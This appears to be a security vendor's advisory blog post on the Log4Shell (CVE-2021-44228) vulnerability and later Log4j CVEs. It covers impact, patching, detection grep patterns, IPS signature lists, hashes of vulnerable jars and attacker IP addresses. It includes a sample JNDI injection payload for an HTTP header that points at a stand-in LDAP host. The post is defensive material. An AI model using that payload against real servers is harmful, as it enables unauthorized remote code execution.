Simulating and Preventing CVE-2021-44228 Apache Log4j RCE Exploits

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

Picus Labs has updated the Picus Threat Library with attacks that exploit CVE-2021-44228 Remote Code Execution (RCE) vulnerability affecting Apache Log4j - the ubiquitous Java logging library.

What is the CVE-2021-44228 Log4j Unauthenticated RCE Vulnerability?

Apache Log4j versions prior to 2.15.0 do not protect against attacker-controlled LDAP and other JNDI-related endpoints. When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers. This vulnerability is also dubbed Log4Shell or LogJam.

Test your security controls now: Prevent Log4Shell Exploits with Picus

The CVE-2021-44228 is a remote code execution vulnerability that can be exploited without authentication. Therefore, CVE-2021-44228 is an unauthenticated RCE vulnerability affecting Apache Log4j versions before 2.15.0.

Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)

Update (December 28, 2021): A new vulnerability (CVE-2021-44832) is found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an Arbitrary Code Execution vulnerability. Since it can be exploited by an attacker with permission to modify the logging configuration, its severity is lower than Log4Shell (CVE-2021-44228). Its base CVSS score is 6.6 (medium). This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).

Update (December 16, 2021): Since we published this blog post, 2 new vulnerabilities have been discovered.

Apache Log4j versions prior to 2.16.0 are vulnerable to information leaks and remote/local code execution (CVE-2021-45046) flaw. It was first discovered as a denial of service vulnerability. However, later found out that it is also a remote/local code execution vulnerability, which increases its CVSS score from 3.7 (low) to 9.0 (critical).

CVE-2021-45105 is another vulnerability found in Apache Log4j versions prior to 2.17.0. It is a denial of service vulnerability with a CVSS score of 7.5 (high). Similar to CVE-2021-45046, malicious recursive lookup sent via Thread Context Map (MDC) input causes StackOverflowError in this vulnerability.

image (57)

To See the Full Infographic, Click Here

What is the Impact of the Log4j RCE Vulnerability? 

CVE-2021-44228 vulnerability enables remote code executions on systems running vulnerable Log4j versions and allows the attacker full control of the affected server.  For example, attackers can exploit CVE-2021-44228 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.

CVE-2021-44228 is a vulnerability that affects the default configurations of several Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. Thus, it is a high-impact vulnerability affecting widely used software.

Update: CVE-2021-45046 vulnerability also enables remote code execution. However, the delivery of the payload is different from CVE-2021-44228 vulnerability. Exploiting this vulnerability requires control over Thread Context Map input data where the attacker needs to create a malicious payload using JNDI Lookup Pattern. When exploited, this vulnerability results in information leak and remote code execution in some environments and local code execution in all environments.

CVE-2021-45105 vulnerability enables denial of service (DoS) for Log4j versions prior to 2.17.0. Similar to CVE-2021-45046, attacker-controlled Thread Context Map input data can be leveraged to create uncontrolled recursion from self-referential lookups.

What is the Current Situation?

According to BadPackets and Cert NZ,  attackers are actively scanning the Internet for systems running vulnerable Log4j versions and exploiting CVE-2021-44228. This is an expected adversary behavior for a remotely exploitable and unauthenticated code execution vulnerability. 

Log4j Exploit

In order to exploit the Log4j vulnerability, the attacker must initiate the generation of a log entry containing a JNDI request. Thus, the Log4j exploit payload must be contained within logged errors such as exception traces, authentication failures, and other unexpected vectors of user-controlled input. Then, Log4j must process the exploit payload. 

The exploit payload can be sent in a header field of an HTTP request. Picus Labs researchers validated the following sample payload included in the user-agent header:

${jndi:ldap://example.com}

Note that you need to run a malicious LDAP server to exploit the CVE-2021-44228 vulnerability and modify the example.com part of the payload.

Update: According to the Microsoft Threat Intelligence Center, nation-state actors from various countries are already utilizing Log4j vulnerabilities for their benefit. However, it is not easy to determine where these attacks originate from because attackers are using TOR (The Onion Router) to stay anonymous.

From their TTPs (Tactics, Techniques and Procedures), it can be deduced that APTs like PHOSPORUS and HAFNIUM are mutating their ransomware using Log4j vulnerabilities. In the future, it is expected these vulnerabilities will be part of many ransomware attack campaigns.

What Should You Do for Remediation?

The CVE-2021-44228 Log4j RCE vulnerability was patched in Log4J v2.15.0  by Apache. Therefore, it is not a zero-day vulnerability. To protect against these attacks, we highly advise organizations to identify vulnerable systems on their networks and update vulnerable Log4j installations.

This vulnerability can also be mitigated in previous releases (>=2.10):

  • by setting the system property "log4j2.formatMsgNoLookups" to "true" 
  • by removing the JndiLookup class from the classpath (example command: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). 

Java 8u121 protects against RCE by setting the properties "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false."

Please keep in mind that Log4J v1 is no longer supported and will not receive patches to address this issue. Log4J v1 is also vulnerable to other RCE attacks, and we strongly advise you to upgrade to Log4J 2.15.0 as soon as possible.

Update: Due to new vulnerabilities found, Apache released Log4j version 2.17.0. This latest version remedies recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.

How Can You Detect CVE-2021-44228 Vulnerability Exploitation Attempts?

Florian Roth, the Head of Research at Nextron Systems, has shared a set of YARA rules for detecting CVE-2021-44228 exploit attempts.

You can also utilize the following shell commands to search for exploitation attempts in uncompressed and compressed files respectively in the /var/log directory and all its subdirectories:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://[^\n]+'

How Picus Helps Simulate and Prevent CVE-2021-44228 Exploits?

We strongly suggest simulating CVE-2021-44228 vulnerability to test the effectiveness of your security controls against Log4J attacks, determine gaps, and utilize prevention signatures to fill your security gaps using the Picus Security Control Validation Platform. 

Just click Start to see and try how you can simulate Log4j attacks and obtain prevention signatures using Picus with just a few clicks.

 

 

Test your security controls now: Prevent Log4Shell Exploits with Picus

 

Picus Threat Library includes the following threat for CVE-2021-44228 vulnerability. Moreover, it contains 1500+ vulnerability exploitation and endpoint attacks in addition to 11.000+ other threats as of today.

Threat ID

Action Name

Attack Module

21296

Apache Log4j Web Attack Campaign

Web Application

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2021-44228 Log4J RCE and other vulnerability exploitation attacks in preventive security controls. Currently validates signatures are given below:

 

Security Control

Signature IDs

Signature Name

Forcepoint NGFW

 

Generic_CS-Log4j-Remote-Code-Execution

Forcepoint NGFW

 

HTTP_CS_Log4j-Remote-Code-Execution

Palo Alto Networks NGFW

91991, 91994, 92001

Apache Log4j Remote Code Execution Vulnerability

Check Point NGFW

asm_dynamic_prop_CVE_2021_44228

Apache Log4j Remote Code Execution (CVE-2021-44228)

FortiGate NGFW

51006

Apache.Log4j.Error.Log.Remote.Code.Execution

Snort IPS

2034655

ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)

Snort IPS

2034647

ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)

Snort IPS

2034658

ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)

Snort IPS

2034648

ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)

Snort IPS

2034654

ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)

Snort IPS

2034668

ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)

Snort IPS

2034649

ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)

Snort IPS

2034657

ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)

Snort IPS

2034650

ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)

Snort IPS

2034653

ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)

Snort IPS

2034667

ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)

Snort IPS

2034651

ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)

Snort IPS

2034656

ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)

Snort IPS

2034652

ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)

Snort IPS

2034659

ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228)

Snort IPS

2034659

ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)

Snort IPS

2034660

ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228)

Snort IPS

2034673

ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)

Snort IPS

2034661, 2034662

ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)

Snort IPS

2034665, 2034666

ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)

Snort IPS

2034663, 2034664

ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)

Snort IPS

58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58725, 58737, 58738, 58739, 58744

SERVER-OTHER Apache Log4j logging remote code execution attempt

F5 BIG-IP ASM

200104772

JNDI Injection Attempt (Content)

F5 BIG-IP ASM

200104769

JNDI Injection Attempt (Header)

F5 BIG-IP ASM

200104768

JNDI Injection Attempt (Parameter)

F5 BIG-IP ASM

200104723

JNDI Injection Attempt (ldap) (Header)

F5 BIG-IP ASM

200104725

JNDI Injection Attempt (rmi) (Header)

F5 BIG-IP ASM

200004451

JSP Expression Language Expression Injection (2) (Header)

F5 BIG-IP ASM

200004450

JSP Expression Language Expression Injection (2) (Parameter)

F5 BIG-IP ASM

200104773

JSP Expression Language Expression Injection (3) (Content)

F5 BIG-IP ASM

200104771

JSP Expression Language Expression Injection (3) (Header)

F5 BIG-IP ASM

200104770

JSP Expression Language Expression Injection (3) (Parameter)

F5 BIG-IP ASM

200004474

JSP Expression Language Expression Injection (3) (URI)

Cisco Firepower NGFW

58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58722, 58723, 58724, 58725, 58737, 58738, 58739, 58742, 58744

SERVER-OTHER Apache Log4j logging remote code execution attempt

Citrix Web App Firewall

999078

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228)

Citrix Web App Firewall

999077

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228)

Citrix Web App Firewall

999079

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228)

Citrix Web App Firewall

999080

WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228)

Citrix Web App Firewall

999077

web-misc apache log4j - remote code execution vulnerability via form (cve-2021-44228)

Citrix Web App Firewall

999079

web-misc apache log4j - remote code execution vulnerability via header (cve-2021-44228)

FortiWeb Web Application Security

90490119, 90490120

Known Exploits

McAfee NSP

0x4529f700

HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228)

ModSecurity

932100

Remote Command Execution: Unix Command Injection

ModSecurity

932130

Remote Command Execution: Unix Shell Expression Found

TippingPoint TPS

40627

HTTP: JNDI Injection in HTTP Request

We will update the above list when Picus Labs validate the signatures of other vendors/products.

Which Log4j  Versions are Vulnerable?

CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in the below table:

Filename SHA-256 Hash
./log4j-2.0-alpha1/log4j-core-2.0-alpha1.jar 006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85
./apache-log4j-2.0-alpha2-bin/log4j-core-2.0-alpha2.jar bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6
./apache-log4j-2.0-beta1-bin/log4j-core-2.0-beta1.jar 58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae
./apache-log4j-2.0-beta2-bin/log4j-core-2.0-beta2.jar ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4
./apache-log4j-2.0-beta3-bin/log4j-core-2.0-beta3.jar dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e
./apache-log4j-2.0-beta4-bin/log4j-core-2.0-beta4.jar a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8
./apache-log4j-2.0-beta5-bin/log4j-core-2.0-beta5.jar 7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b
./apache-log4j-2.0-beta6-bin/log4j-core-2.0-beta6.jar 4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47
./apache-log4j-2.0-beta7-bin/log4j-core-2.0-beta7.jar 473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6
./apache-log4j-2.0-beta8-bin/log4j-core-2.0-beta8.jar b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02
./apache-log4j-2.0-beta9-bin/log4j-core-2.0-beta9.jar dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d
./apache-log4j-2.0-bin/log4j-core-2.0.jar 85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c
./apache-log4j-2.0-rc1-bin/log4j-core-2.0-rc1.jar db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a
./apache-log4j-2.0-rc2-bin/log4j-core-2.0-rc2.jar ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0
./apache-log4j-2.0.1-bin/log4j-core-2.0.1.jar a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d
./apache-log4j-2.0.2-bin/log4j-core-2.0.2.jar c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d
./apache-log4j-2.1-bin/log4j-core-2.1.jar 8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc
./apache-log4j-2.2-bin/log4j-core-2.2.jar c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a
./apache-log4j-2.3-bin/log4j-core-2.3.jar 6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2
./apache-log4j-2.4-bin/log4j-core-2.4.jar 535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6
./apache-log4j-2.4.1-bin/log4j-core-2.4.1.jar 42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239
./apache-log4j-2.5-bin/log4j-core-2.5.jar 4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997
./apache-log4j-2.6-bin/log4j-core-2.6.jar df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6
./apache-log4j-2.6.1-bin/log4j-core-2.6.1.jar 28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e
./apache-log4j-2.6.2-bin/log4j-core-2.6.2.jar cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392
./apache-log4j-2.7-bin/log4j-core-2.7.jar 5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
./apache-log4j-2.8-bin/log4j-core-2.8.jar ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa
./apache-log4j-2.8.1-bin/log4j-core-2.8.1.jar 815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e
./apache-log4j-2.8.2-bin/log4j-core-2.8.2.jar 10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c
./apache-log4j-2.9.0-bin/log4j-core-2.9.0.jar dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae
./apache-log4j-2.9.1-bin/log4j-core-2.9.1.jar 9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d
./apache-log4j-2.10.0-bin/log4j-core-2.10.0.jar f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d
./apache-log4j-2.11.0-bin/log4j-core-2.11.0.jar 5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3
./apache-log4j-2.11.1-bin/log4j-core-2.11.1.jar d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d
./apache-log4j-2.11.2-bin/log4j-core-2.11.2.jar 3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100
./apache-log4j-2.12.0-bin/log4j-core-2.12.0.jar 057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3
./apache-log4j-2.12.1-bin/log4j-core-2.12.1.jar 5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c
./apache-log4j-2.13.0-bin/log4j-core-2.13.0.jar c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3
./apache-log4j-2.13.1-bin/log4j-core-2.13.1.jar 6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992
./apache-log4j-2.13.2-bin/log4j-core-2.13.2.jar 54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b
./apache-log4j-2.13.3-bin/log4j-core-2.13.3.jar e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1
./apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar 68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa
./apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar 9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463

Indicators of Compromise (IOCs)

It has been observed that the attached IP addresses are exploiting CVE-2021-44228 Log4j vulnerability. Although most of them are IP addresses of TOR exit nodes and blocking them may result in false positives, it is suggested to block these addresses in such critical cases.

18.27.197.252 171.25.193.25 185.220.101.34 185.220.101.158 204.8.156.142 164.90.199.216
23.129.64.131 171.25.193.77 185.220.101.35 185.220.101.161 205.185.117.149 167.99.164.201
23.129.64.141 171.25.193.78 185.220.101.36 185.220.101.163 209.127.17.242 167.99.172.58
23.129.64.146 178.62.79.49 185.220.101.42 185.220.101.168 209.141.41.103 167.99.172.213
23.129.64.148 181.214.39.2 185.220.101.43 185.220.101.169 45.153.160.131 185.220.100.241
45.12.134.108 185.38.175.132 185.220.101.45 185.220.101.172 45.153.160.138 185.220.101.37
45.155.205.233 185.83.214.69 185.220.101.46 185.220.101.175 62.76.41.46 185.220.101.41
46.166.139.111 185.100.87.41 185.220.101.49 185.220.101.177 68.183.44.143 185.220.101.57
46.182.21.248 185.100.87.202 185.220.101.54 185.220.101.179 68.183.198.247 185.220.101.134
51.15.43.205 185.107.47.171 185.220.101.55 185.220.101.180 88.80.20.86 185.220.101.144
51.255.106.85 185.129.61.1 185.220.101.56 185.220.101.181 109.70.100.34 185.220.101.154
54.173.99.121 185.220.100.240 185.220.101.61 185.220.101.182 109.237.96.124 185.220.101.160
62.102.148.69 185.220.100.242 185.220.101.129 185.220.101.185 116.24.67.213 185.220.101.171
72.223.168.73 185.220.100.243 185.220.101.138 185.220.101.189 134.122.34.28 185.220.101.186
81.17.18.60 185.220.100.244 185.220.101.139 185.220.101.191 137.184.102.82 185.220.102.249
104.244.72.115 185.220.100.245 185.220.101.141 185.220.102.8 137.184.106.119 188.166.48.55
104.244.74.57 185.220.100.246 185.220.101.142 185.220.102.242 142.93.34.250 188.166.92.228
104.244.74.211 185.220.100.247 185.220.101.143 193.31.24.154 143.198.32.72 188.166.122.43
104.244.76.170 185.220.100.248 185.220.101.145 193.189.100.203 143.198.45.117 193.189.100.195
107.189.1.160 185.220.100.249 185.220.101.147 193.218.118.231 147.182.167.165 193.218.118.183
107.189.1.178 185.220.100.252 185.220.101.148 194.48.199.78 147.182.169.254 195.19.192.26
107.189.12.135 185.220.100.253 185.220.101.149 195.176.3.24 147.182.219.9 212.193.57.225
107.189.14.98 185.220.100.254 185.220.101.153 195.254.135.76 151.115.60.113  
122.161.50.23 185.220.100.255 185.220.101.156 198.98.51.189 159.65.58.66  
171.25.193.20 185.220.101.33 185.220.101.157 199.195.250.77 159.65.155.208